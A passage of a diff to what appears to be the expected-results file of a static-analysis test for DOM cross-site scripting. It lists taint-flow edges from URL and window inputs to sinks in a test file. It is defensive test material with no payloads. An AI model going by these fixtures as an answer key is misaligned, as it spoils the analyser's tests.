    " | provenance | Config | -| tst.js:46:21:46:44 | documen ... .search | tst.js:42:15:42:15 | s | provenance | | -| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | provenance | | -| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | provenance | Config | -| tst.js:48:15:48:15 | s | tst.js:50:12:50:12 | s | provenance | | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | Config | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | Config | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | provenance | | -| tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | provenance | | -| tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | provenance | Config | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | provenance | | -| tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... search) | provenance | | -| tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... search) | provenance | Config | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | Config | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | provenance | | -| tst.js:58:26:58:30 | bar() | tst.js:58:21:58:31 | chop(bar()) | provenance | | -| tst.js:58:26:58:30 | bar() | tst.js:58:21:58:31 | chop(bar()) | provenance | Config | -| tst.js:60:34:60:34 | s | tst.js:62:18:62:18 | s | provenance | | -| tst.js:64:25:64:48 | documen ... .search | tst.js:60:34:60:34 | s | provenance | | -| tst.js:65:25:65:48 | documen ... .search | tst.js:60:34:60:34 | s | provenance | | -| tst.js:70:1:70:27 | [,docum ... search] [1] | tst.js:70:46:70:46 | x | provenance | | -| tst.js:70:3:70:26 | documen ... .search | tst.js:70:1:70:27 | [,docum ... search] [1] | provenance | | -| tst.js:70:46:70:46 | x | tst.js:73:20:73:20 | x | provenance | | -| tst.js:107:7:107:44 | v | tst.js:110:18:110:18 | v | provenance | | -| tst.js:107:7:107:44 | v | tst.js:136:18:136:18 | v | provenance | | -| tst.js:107:11:107:34 | documen ... .search | tst.js:107:11:107:44 | documen ... bstr(1) | provenance | | -| tst.js:107:11:107:34 | documen ... .search | tst.js:107:11:107:44 | documen ... bstr(1) | provenance | Config | -| tst.js:107:11:107:44 | documen ... bstr(1) | tst.js:107:7:107:44 | v | provenance | | -| tst.js:148:29:148:50 | window. ... .search | tst.js:151:29:151:29 | v | provenance | | -| tst.js:151:29:151:29 | v | tst.js:151:49:151:49 | v | provenance | | -| tst.js:158:40:158:61 | window. ... .search | tst.js:155:29:155:46 | xssSourceService() | provenance | | -| tst.js:177:9:177:41 | target | tst.js:180:28:180:33 | target | provenance | | -| tst.js:177:18:177:41 | documen ... .search | tst.js:177:9:177:41 | target | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:186:31:186:37 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:188:42:188:48 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:189:33:189:39 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:191:54:191:60 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:192:45:192:51 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:193:49:193:55 | tainted | provenance | | -| tst.js:184:19:184:42 | documen ... .search | tst.js:184:9:184:42 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:199:67:199:73 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:200:67:200:73 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:236:35:236:41 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:238:20:238:26 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:240:23:240:29 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:241:23:241:29 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:255:23:255:29 | tainted | provenance | | -| tst.js:197:19:197:42 | documen ... .search | tst.js:197:9:197:42 | tainted | provenance | | -| tst.js:199:67:199:73 | tainted | tst.js:200:67:200:73 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:204:35:204:41 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:206:46:206:52 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:207:38:207:44 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:208:35:208:41 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:236:35:236:41 | tainted | provenance | | -| tst.js:204:35:204:41 | tainted | tst.js:212:28:212:46 | this.state.tainted1 | provenance | | -| tst.js:206:46:206:52 | tainted | tst.js:213:28:213:46 | this.state.tainted2 | provenance | | -| tst.js:207:38:207:44 | tainted | tst.js:214:28:214:46 | this.state.tainted3 | provenance | | -| tst.js:208:35:208:41 | tainted | tst.js:218:32:218:49 | prevState.tainted4 | provenance | | -| tst.js:236:35:236:41 | tainted | tst.js:225:28:225:46 | this.props.tainted1 | provenance | | -| tst.js:236:35:236:41 | tainted | tst.js:238:20:238:26 | tainted | provenance | | -| tst.js:238:20:238:26 | tainted | tst.js:226:28:226:46 | this.props.tainted2 | provenance | | -| tst.js:238:20:238:26 | tainted | tst.js:240:23:240:29 | tainted | provenance | | -| tst.js:240:23:240:29 | tainted | tst.js:227:28:227:46 | this.props.tainted3 | provenance | | -| tst.js:240:23:240:29 | tainted | tst.js:241:23:241:29 | tainted | provenance | | -| tst.js:241:23:241:29 | tainted | tst.js:231:32:231:49 | prevProps.tainted4 | provenance | | -| tst.js:241:23:241:29 | tainted | tst.js:255:23:255:29 | tainted | provenance | | -| tst.js:247:39:247:55 | props.propTainted | tst.js:251:60:251:82 | this.st ... Tainted | provenance | | -| tst.js:255:23:255:29 | tainted | tst.js:247:39:247:55 | props.propTainted | provenance | | -| tst.js:285:9:285:29 | tainted | tst.js:288:59:288:65 | tainted | provenance | | -| tst.js:285:19:285:29 | window.name | tst.js:285:9:285:29 | tainted | provenance | | -| tst.js:301:9:301:16 | location | tst.js:302:10:302:10 | e | provenance | | -| tst.js:302:10:302:10 | e | tst.js:303:20:303:20 | e | provenance | | -| tst.js:308:10:308:17 | location | tst.js:310:10:310:10 | e | provenance | | -| tst.js:310:10:310:10 | e | tst.js:311:20:311:20 | e | provenance | | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | provenance | | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams] | tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | provenance | | -| tst.js:327:18:327:34 | document.location | tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | provenance | | -| tst.js:327:18:327:34 | document.location | tst.js:327:10:327:35 | new URL ... cation) [searchParams] | provenance | | -| tst.js:331:7:331:43 | params | tst.js:332:18:332:23 | params | provenance | | -| tst.js:331:7:331:43 | params [MapValue] | tst.js:332:18:332:23 | params [MapValue] | provenance | | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | tst.js:331:16:331:43 | getTain ... hParams [MapValue] | provenance | | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | tst.js:331:16:331:43 | getTain ... hParams | provenance | | -| tst.js:331:16:331:43 | getTain ... hParams | tst.js:331:7:331:43 | params | provenance | | -| tst.js:331:16:331:43 | getTain ... hParams [MapValue] | tst.js:331:7:331:43 | params [MapValue] | provenance | | -| tst.js:332:18:332:23 | params | tst.js:332:18:332:35 | params.get('name') | provenance | Config | -| tst.js:332:18:332:23 | params [MapValue] | tst.js:332:18:332:35 | params.get('name') | provenance | | -| tst.js:341:12:341:37 | new URL ... cation) [hash] | tst.js:343:5:343:12 | getUrl() [hash] | provenance | | -| tst.js:341:20:341:36 | document.location | tst.js:341:12:341:37 | new URL ... cation) [hash] | provenance | | -| tst.js:343:5:343:12 | getUrl() [hash] | tst.js:343:5:343:17 | getUrl().hash | provenance | | -| tst.js:343:5:343:17 | getUrl().hash | tst.js:343:5:343:30 | getUrl( ... ring(1) | provenance | Config | -| tst.js:348:7:348:39 | target | tst.js:349:12:349:17 | target | provenance | | -| tst.js:348:16:348:39 | documen ... .search | tst.js:348:7:348:39 | target | provenance | | -| tst.js:355:10:355:42 | target | tst.js:356:16:356:21 | target | provenance | | -| tst.js:355:10:355:42 | target | tst.js:357:20:357:25 | target | provenance | | -| tst.js:355:19:355:42 | documen ... .search | tst.js:355:10:355:42 | target | provenance | | -| tst.js:356:16:356:21 | target | tst.js:357:20:357:25 | target | provenance | | -| tst.js:357:20:357:25 | target | tst.js:360:21:360:26 | target | provenance | | -| tst.js:357:20:357:25 | target | tst.js:363:18:363:23 | target | provenance | | -| tst.js:371:7:371:39 | target | tst.js:374:18:374:23 | target | provenance | | -| tst.js:371:16:371:39 | documen ... .search | tst.js:371:7:371:39 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:384:18:384:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:386:18:386:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:397:18:397:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:406:18:406:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:408:19:408:24 | target | provenance | | -| tst.js:381:16:381:39 | documen ... .search | tst.js:381:7:381:39 | target | provenance | | -| tst.js:386:18:386:23 | target | tst.js:386:18:386:29 | target.taint | provenance | | -| tst.js:391:3:391:8 | [post update] target [taint3] | tst.js:392:18:392:23 | target [taint3] | provenance | | -| tst.js:391:19:391:42 | documen ... .search | tst.js:391:3:391:8 | [post update] target [taint3] | provenance | | -| tst.js:392:18:392:23 | target [taint3] | tst.js:392:18:392:30 | target.taint3 | provenance | | -| tst.js:397:18:397:23 | target | tst.js:397:18:397:30 | target.taint5 | provenance | | -| tst.js:406:18:406:23 | target | tst.js:406:18:406:30 | target.taint7 | provenance | | -| tst.js:408:3:408:8 | [post update] target [taint8] | tst.js:408:19:408:24 | target [taint8] | provenance | | -| tst.js:408:3:408:8 | [post update] target [taint8] | tst.js:409:18:409:23 | target [taint8] | provenance | | -| tst.js:408:19:408:24 | target | tst.js:408:19:408:31 | target.taint8 | provenance | | -| tst.js:408:19:408:24 | target [taint8] | tst.js:408:19:408:31 | target.taint8 | provenance | | -| tst.js:408:19:408:31 | target.taint8 | tst.js:408:3:408:8 | [post update] target [taint8] | provenance | | -| tst.js:409:18:409:23 | target [taint8] | tst.js:409:18:409:30 | target.taint8 | provenance | | -| tst.js:416:7:416:46 | payload | tst.js:417:18:417:24 | payload | provenance | | -| tst.js:416:17:416:36 | window.location.hash | tst.js:416:17:416:46 | window. ... bstr(1) | provenance | | -| tst.js:416:17:416:36 | window.location.hash | tst.js:416:17:416:46 | window. ... bstr(1) | provenance | Config | -| tst.js:416:17:416:46 | window. ... bstr(1) | tst.js:416:7:416:46 | payload | provenance | | -| tst.js:419:7:419:55 | match | tst.js:421:20:421:24 | match | provenance | | -| tst.js:419:15:419:34 | window.location.hash | tst.js:419:15:419:55 | window. ... (\\w+)/) | provenance | | -| tst.js:419:15:419:55 | window. ... (\\w+)/) | tst.js:419:7:419:55 | match | provenance | | -| tst.js:421:20:421:24 | match | tst.js:421:20:421:27 | match[1] | provenance | | -| tst.js:424:18:424:37 | window.location.hash | tst.js:424:18:424:48 | window. ... it('#') [1] | provenance | Config | -| tst.js:424:18:424:48 | window. ... it('#') [1] | tst.js:424:18:424:51 | window. ... '#')[1] | provenance | | -| tst.js:428:7:428:39 | target | tst.js:430:18:430:23 | target | provenance | | -| tst.js:428:16:428:39 | documen ... .search | tst.js:428:7:428:39 | target | provenance | | -| tst.js:430:18:430:23 | target | tst.js:430:18:430:89 | target. ... data>') | provenance | | -| tst.js:436:6:436:38 | source | tst.js:440:28:440:33 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:441:33:441:38 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:442:34:442:39 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:443:41:443:46 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:444:44:444:49 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:445:32:445:37 | source | provenance | | -| tst.js:436:15:436:38 | documen ... .search | tst.js:436:6:436:38 | source | provenance | | -| tst.js:453:7:453:39 | source | tst.js:455:18:455:23 | source | provenance | | -| tst.js:453:7:453:39 | source | tst.js:456:36:456:41 | source | provenance | | -| tst.js:453:16:453:39 | documen ... .search | tst.js:453:7:453:39 | source | provenance | | -| tst.js:456:36:456:41 | source | tst.js:456:18:456:42 | ansiToH ... source) | provenance | | -| tst.js:460:6:460:38 | source | tst.js:463:21:463:26 | source | provenance | | -| tst.js:460:6:460:38 | source | tst.js:465:19:465:24 | source | provenance | | -| tst.js:460:6:460:38 | source | tst.js:467:20:467:25 | source | provenance | | -| tst.js:460:15:460:38 | documen ... .search | tst.js:460:6:460:38 | source | provenance | | -| tst.js:471:7:471:46 | url | tst.js:473:19:473:21 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:474:26:474:28 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:475:25:475:27 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:476:20:476:22 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:486:22:486:24 | url | provenance | | -| tst.js:471:13:471:36 | documen ... .search | tst.js:471:13:471:46 | documen ... bstr(1) | provenance | Config | -| tst.js:471:13:471:46 | documen ... bstr(1) | tst.js:471:7:471:46 | url | provenance | | -| tst.js:491:23:491:35 | location.hash | tst.js:491:23:491:45 | locatio ... bstr(1) | provenance | Config | -| tst.js:494:18:494:30 | location.hash | tst.js:494:18:494:40 | locatio ... bstr(1) | provenance | Config | -| tst.js:501:43:501:62 | window.location.hash | tst.js:501:33:501:63 | decodeU ... n.hash) | provenance | | -| tst.js:508:7:508:39 | target | tst.js:509:18:509:23 | target | provenance | | -| tst.js:508:16:508:39 | documen ... .search | tst.js:508:7:508:39 | target | provenance | | -| tst.js:509:18:509:23 | target | tst.js:509:18:509:54 | target. ... "), '') | provenance | | +| tst.js:6:37:6:58 | documen ... on.href | tst.js:6:37:6:114 | documen ... t=")+8) | provenance | | +| tst.js:6:37:6:58 | documen ... on.href | tst.js:6:37:6:114 | documen ... t=")+8) | provenance | Config | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | Config | +| tst.js:9:28:9:33 | target | tst.js:9:5:9:42 | '
    ' | provenance | Config | +| tst.js:14:7:14:56 | params | tst.js:15:18:15:23 | params | provenance | | +| tst.js:14:7:14:56 | params [MapValue] | tst.js:15:18:15:23 | params [MapValue] | provenance | | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | provenance | | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | tst.js:14:16:14:56 | (new UR ... hParams | provenance | | +| tst.js:14:16:14:56 | (new UR ... hParams | tst.js:14:7:14:56 | params | provenance | | +| tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | tst.js:14:7:14:56 | params [MapValue] | provenance | | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | provenance | | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams] | tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | provenance | | +| tst.js:14:25:14:41 | document.location | tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | provenance | | +| tst.js:14:25:14:41 | document.location | tst.js:14:17:14:42 | new URL ... cation) [searchParams] | provenance | | +| tst.js:15:18:15:23 | params | tst.js:15:18:15:35 | params.get('name') | provenance | Config | +| tst.js:15:18:15:23 | params [MapValue] | tst.js:15:18:15:35 | params.get('name') | provenance | | +| tst.js:17:7:17:61 | searchParams | tst.js:18:18:18:29 | searchParams | provenance | | +| tst.js:17:7:17:61 | searchParams [MapValue] | tst.js:18:18:18:29 | searchParams [MapValue] | provenance | | +| tst.js:17:22:17:61 | new URL ... ing(1)) | tst.js:17:7:17:61 | searchParams | provenance | | +| tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | tst.js:17:7:17:61 | searchParams [MapValue] | provenance | | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | Config | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | Config | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:18:18:18:29 | searchParams | tst.js:18:18:18:41 | searchP ... 'name') | provenance | Config | +| tst.js:18:18:18:29 | searchParams [MapValue] | tst.js:18:18:18:41 | searchP ... 'name') | provenance | | +| tst.js:21:14:21:19 | target | tst.js:22:18:22:23 | target | provenance | | +| tst.js:24:5:24:28 | documen ... .search | tst.js:21:14:21:19 | target | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:29:16:29:20 | bar() | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:48:26:48:30 | bar() | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:56:16:56:20 | bar() | provenance | | +| tst.js:31:14:31:14 | x | tst.js:32:10:32:10 | x | provenance | | +| tst.js:34:20:34:43 | documen ... .search | tst.js:31:14:31:14 | x | provenance | | +| tst.js:34:20:34:43 | documen ... .search | tst.js:34:16:34:44 | baz(doc ... search) | provenance | | +| tst.js:36:15:36:15 | s | tst.js:37:20:37:20 | s | provenance | | +| tst.js:36:15:36:15 | s | tst.js:37:20:37:20 | s | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
    " ...
    " | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
    " ...
    " | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
    " ...
    " | provenance | Config | +| tst.js:39:21:39:44 | documen ... .search | tst.js:36:15:36:15 | s | provenance | | +| tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | provenance | | +| tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | provenance | Config | +| tst.js:41:15:41:15 | s | tst.js:43:12:43:12 | s | provenance | | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | Config | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | Config | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | provenance | | +| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | provenance | | +| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | provenance | Config | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | provenance | | +| tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... search) | provenance | | +| tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... search) | provenance | Config | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | Config | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | provenance | | +| tst.js:48:26:48:30 | bar() | tst.js:48:21:48:31 | chop(bar()) | provenance | | +| tst.js:48:26:48:30 | bar() | tst.js:48:21:48:31 | chop(bar()) | provenance | Config | +| tst.js:50:34:50:34 | s | tst.js:51:18:51:18 | s | provenance | | +| tst.js:53:25:53:48 | documen ... .search | tst.js:50:34:50:34 | s | provenance | | +| tst.js:54:25:54:48 | documen ... .search | tst.js:50:34:50:34 | s | provenance | | +| tst.js:58:1:58:27 | [,docum ... search] [1] | tst.js:58:46:58:46 | x | provenance | | +| tst.js:58:3:58:26 | documen ... .search | tst.js:58:1:58:27 | [,docum ... search] [1] | provenance | | +| tst.js:58:46:58:46 | x | tst.js:60:20:60:20 | x | provenance | | +| tst.js:93:7:93:44 | v | tst.js:95:18:95:18 | v | provenance | | +| tst.js:93:7:93:44 | v | tst.js:120:18:120:18 | v | provenance | | +| tst.js:93:11:93:34 | documen ... .search | tst.js:93:11:93:44 | documen ... bstr(1) | provenance | | +| tst.js:93:11:93:34 | documen ... .search | tst.js:93:11:93:44 | documen ... bstr(1) | provenance | Config | +| tst.js:93:11:93:44 | documen ... bstr(1) | tst.js:93:7:93:44 | v | provenance | | +| tst.js:132:29:132:50 | window. ... .search | tst.js:135:29:135:29 | v | provenance | | +| tst.js:135:29:135:29 | v | tst.js:135:49:135:49 | v | provenance | | +| tst.js:142:40:142:61 | window. ... .search | tst.js:139:29:139:46 | xssSourceService() | provenance | | +| tst.js:161:9:161:41 | target | tst.js:164:28:164:33 | target | provenance | | +| tst.js:161:18:161:41 | documen ... .search | tst.js:161:9:161:41 | target | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:170:31:170:37 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:172:42:172:48 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:173:33:173:39 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:175:54:175:60 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:176:45:176:51 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:177:49:177:55 | tainted | provenance | | +| tst.js:168:19:168:42 | documen ... .search | tst.js:168:9:168:42 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:183:67:183:73 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:184:67:184:73 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:220:35:220:41 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:222:20:222:26 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:224:23:224:29 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:225:23:225:29 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:239:23:239:29 | tainted | provenance | | +| tst.js:181:19:181:42 | documen ... .search | tst.js:181:9:181:42 | tainted | provenance | | +| tst.js:183:67:183:73 | tainted | tst.js:184:67:184:73 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:188:35:188:41 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:190:46:190:52 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:191:38:191:44 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:192:35:192:41 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:220:35:220:41 | tainted | provenance | | +| tst.js:188:35:188:41 | tainted | tst.js:196:28:196:46 | this.state.tainted1 | provenance | | +| tst.js:190:46:190:52 | tainted | tst.js:197:28:197:46 | this.state.tainted2 | provenance | | +| tst.js:191:38:191:44 | tainted | tst.js:198:28:198:46 | this.state.tainted3 | provenance | | +| tst.js:192:35:192:41 | tainted | tst.js:202:32:202:49 | prevState.tainted4 | provenance | | +| tst.js:220:35:220:41 | tainted | tst.js:209:28:209:46 | this.props.tainted1 | provenance | | +| tst.js:220:35:220:41 | tainted | tst.js:222:20:222:26 | tainted | provenance | | +| tst.js:222:20:222:26 | tainted | tst.js:210:28:210:46 | this.props.tainted2 | provenance | | +| tst.js:222:20:222:26 | tainted | tst.js:224:23:224:29 | tainted | provenance | | +| tst.js:224:23:224:29 | tainted | tst.js:211:28:211:46 | this.props.tainted3 | provenance | | +| tst.js:224:23:224:29 | tainted | tst.js:225:23:225:29 | tainted | provenance | | +| tst.js:225:23:225:29 | tainted | tst.js:215:32:215:49 | prevProps.tainted4 | provenance | | +| tst.js:225:23:225:29 | tainted | tst.js:239:23:239:29 | tainted | provenance | | +| tst.js:231:39:231:55 | props.propTainted | tst.js:235:60:235:82 | this.st ... Tainted | provenance | | +| tst.js:239:23:239:29 | tainted | tst.js:231:39:231:55 | props.propTainted | provenance | | +| tst.js:269:9:269:29 | tainted | tst.js:272:59:272:65 | tainted | provenance | | +| tst.js:269:19:269:29 | window.name | tst.js:269:9:269:29 | tainted | provenance | | +| tst.js:285:9:285:16 | location | tst.js:286:10:286:10 | e | provenance | | +| tst.js:286:10:286:10 | e | tst.js:287:20:287:20 | e | provenance | | +| tst.js:292:10:292:17 | location | tst.js:294:10:294:10 | e | provenance | | +| tst.js:294:10:294:10 | e | tst.js:295:20:295:20 | e | provenance | | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | provenance | | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams] | tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | provenance | | +| tst.js:311:18:311:34 | document.location | tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | provenance | | +| tst.js:311:18:311:34 | document.location | tst.js:311:10:311:35 | new URL ... cation) [searchParams] | provenance | | +| tst.js:315:7:315:43 | params | tst.js:316:18:316:23 | params | provenance | | +| tst.js:315:7:315:43 | params [MapValue] | tst.js:316:18:316:23 | params [MapValue] | provenance | | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | tst.js:315:16:315:43 | getTain ... hParams [MapValue] | provenance | | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | tst.js:315:16:315:43 | getTain ... hParams | provenance | | +| tst.js:315:16:315:43 | getTain ... hParams | tst.js:315:7:315:43 | params | provenance | | +| tst.js:315:16:315:43 | getTain ... hParams [MapValue] | tst.js:315:7:315:43 | params [MapValue] | provenance | | +| tst.js:316:18:316:23 | params | tst.js:316:18:316:35 | params.get('name') | provenance | Config | +| tst.js:316:18:316:23 | params [MapValue] | tst.js:316:18:316:35 | params.get('name') | provenance | | +| tst.js:325:12:325:37 | new URL ... cation) [hash] | tst.js:327:5:327:12 | getUrl() [hash] | provenance | | +| tst.js:325:20:325:36 | document.location | tst.js:325:12:325:37 | new URL ... cation) [hash] | provenance | | +| tst.js:327:5:327:12 | getUrl() [hash] | tst.js:327:5:327:17 | getUrl().hash | provenance | | +| tst.js:327:5:327:17 | getUrl().hash | tst.js:327:5:327:30 | getUrl( ... ring(1) | provenance | Config | +| tst.js:332:7:332:39 | target | tst.js:333:12:333:17 | target | provenance | | +| tst.js:332:16:332:39 | documen ... .search | tst.js:332:7:332:39 | target | provenance | | +| tst.js:339:10:339:42 | target | tst.js:340:16:340:21 | target | provenance | | +| tst.js:339:10:339:42 | target | tst.js:341:20:341:25 | target | provenance | | +| tst.js:339:19:339:42 | documen ... .search | tst.js:339:10:339:42 | target | provenance | | +| tst.js:340:16:340:21 | target | tst.js:341:20:341:25 | target | provenance | | +| tst.js:341:20:341:25 | target | tst.js:344:21:344:26 | target | provenance | | +| tst.js:341:20:341:25 | target | tst.js:347:18:347:23 | target | provenance | | +| tst.js:355:7:355:39 | target | tst.js:357:18:357:23 | target | provenance | | +| tst.js:355:16:355:39 | documen ... .search | tst.js:355:7:355:39 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:367:18:367:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:369:18:369:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:380:18:380:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:389:18:389:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:391:19:391:24 | target | provenance | | +| tst.js:364:16:364:39 | documen ... .search | tst.js:364:7:364:39 | target | provenance | | +| tst.js:369:18:369:23 | target | tst.js:369:18:369:29 | target.taint | provenance | | +| tst.js:374:3:374:8 | [post update] target [taint3] | tst.js:375:18:375:23 | target [taint3] | provenance | | +| tst.js:374:19:374:42 | documen ... .search | 